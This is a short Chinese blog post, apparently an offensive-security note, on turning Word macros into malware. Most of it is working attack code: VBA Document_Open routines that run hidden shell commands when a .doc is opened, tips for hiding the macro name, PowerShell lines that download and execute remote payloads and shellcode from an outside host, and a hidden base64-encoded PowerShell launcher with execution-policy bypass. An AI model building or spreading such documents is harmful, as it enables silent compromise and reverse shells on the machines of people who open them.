Office 宏的利用

2019-07-30 2019-07-30 About 400 words One minute

Contents

在 Office 中宏指对文档样式, 字体, 排版, 格式修改等一系列操作的统称, 通过 VBA 来完成.

文件格式

以 Word 举例, 一般分为三种格式 .doc, .docx, .docm. 其中 .doc 可保存带有宏的文档, 而 .docx 不能保存, 使用.docm 保存带宏文档时会在文件图标上添加提示宏的标志. 但对于任意文档, 都会有宏的安全警告.

在实战中, 一般使用 .doc 格式.

隐藏宏名

在当前文档中创建新宏.

在 Project - Microsoft Word 对象 - ThisDocument 中编辑宏.

代码如下.

1
2
3
4
5


Private Sub Document_Open()
    Dim cmd
    cmd = "cmd.exe /c whoami > C:\windows\Temp\test.txt"
    Call Shell(cmd, vbHide)
End Sub

Document_Open 指在文档被打开时调用的函数.

删除刚刚创建的宏.

完成后如下图.

保存文件, 选择 .doc 格式.

反弹 Shell

基本的命令执行.

1
2
3
4
5


Private Sub Document_Open()
    Dim cmd
    cmd = "cmd.exe /c whoami > C:\windows\Temp\test.txt"
    Call Shell(cmd, vbHide)
End Sub

powershell 执行.

1
2
3


IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.1/payload.ps1')
IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.1/Invoke-Shellcode.ps1')
Invoke-Shellcode -Shellcode $buf

base64 编码.

1
2
3
4
5


Private Sub Document_Open()
    Dim cmd
    cmd = "powershell.exe -nop -w hidden -ep bypass -enc aQBmACgAWwBJAG4AdABQAHQAc......"
    Call Shell(cmd, vbHide)
End Sub

其余方式可看 msfvenom 中的 vba, vba-exe 等格式, 在此不再赘述.

注意 -ep bypass 设置执行策略.